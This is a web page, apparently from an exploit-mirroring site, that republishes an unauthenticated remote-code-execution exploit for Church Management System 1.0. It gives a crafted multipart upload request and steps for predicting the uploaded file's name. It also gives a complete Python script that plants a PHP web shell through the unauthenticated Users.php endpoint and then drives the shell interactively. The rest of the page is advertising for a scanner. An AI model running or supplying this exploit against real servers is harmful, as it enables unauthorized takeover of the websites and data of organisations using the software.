church management system 1.0 remote code execution (rce) (unauthenticated)

▸▸▸ Exploit & Vulnerability >>   webapps exploit & php vulnerability




Online Vulnerability Scanner Tools
church management system 1.0 remote code execution (rce) (unauthenticated) Code Code... 
				
# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-20
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

# Exploit Details:

# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session.
# 2. Set the 'f' parameter of the POST request to 'save'.
#     - `Users.php?f=save`
# 3. Capture request in burp and replace with with following request.
'''
POST /church_management/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550
Content-Length: 859
Origin: http://localhost
Connection: close
Referer: http://localhost/church_management/admin/?page=user
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="id"

1
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="firstname"

Adminstrator
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="lastname"

Admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="username"

admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="password"


-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php echo phpinfo(); ?>
-----------------------------91105564325608762312322546550--

'''
#   ` Image uploader is renaming your payload using the following function.
         # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
         # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
         # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200
         # concate output with your playload name like this 1632085200_phpinfo.php
# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests.

# RCE via executing exploit:
    # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py
    # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/


import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

header = Style.BRIGHT+Fore.RED+'              '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL

print(Style.BRIGHT+"               Church Management System v1.0")
print(Style.BRIGHT+"            Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)

print(r"""

                        
                                                                                 .----------. 
                                                                 .-''-.         /          /  
     .                            __  __   ___                 .' .-.  )       /   ______.'   
   .'|                           |  |/  `.'   `.              / .'  / /       /   /_          
 .'  |                           |   .-.  .-.   '            (_/   / /       /      '''--.    
<    |            __        __   |  |  |  |  |  | ,.----------.   / /       '___          `.  
 |   | ____    .:--.'.   .:--.'. |  |  |  |  |  |//            \ / /            `'.         | 
 |   | \ .'   / |   \ | / |   \ ||  |  |  |  |  |\\            /. '                )        | 
 |   |/  .    `" __ | | `" __ | ||  |  |  |  |  | `'----------'/ /    _.-')......-'        /  
 |    /\  \    .'.''| |  .'.''| ||__|  |__|  |__|            .' '  _.'.-'' \          _..'`   
 |   |  \  \  / /   | |_/ /   | |_                          /  /.-'_.'      '------'''        
 '    \  \  \ \ \._,\ '/\ \._,\ '/                         /    _.'                           
'------'  '---'`--'  `"  `--'  `"                         ( _.-'                              

                            abdullahkhawaja.com
            """)



GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}



s = requests.Session() 


  
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK=input("Enter URL of The Vulnarable Application : ")


def webshell(LINK, session):
    try:
        WEB_SHELL = LINK+'uploads/'+filename
        getdir  = {'cmd': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print("\r\nExiting.")
        sys.exit(-1)


#Creating a PHP Web Shell

phpshell  = {
               'img': 
                  (
                   'shell.php', 
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 
                   'application/octet-stream', 
                  {'Content-Disposition': 'form-data'}
                  ) 
             }

# Defining value for form data
data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}


def id_generator():
    x = datetime.datetime.now()
    date_string = x.strftime("%y-%m-%d %H:%M")
    date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
    timestamp = datetime.datetime.timestamp(date)
    file = int(timestamp)
    final_name = str(file)+'_shell.php'
    return final_name

filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data)

shell_upload = True if("Undefined index: id in" in upload.text) else False
u=shell_upload
if u:
	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)



#Executing The Webshell
webshell(LINK, s)

Church management system 1.0 remote code execution (rce) (unauthenticated) Vulnerability / Exploit Source : Church management system 1.0 remote code execution (rce) (unauthenticated)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.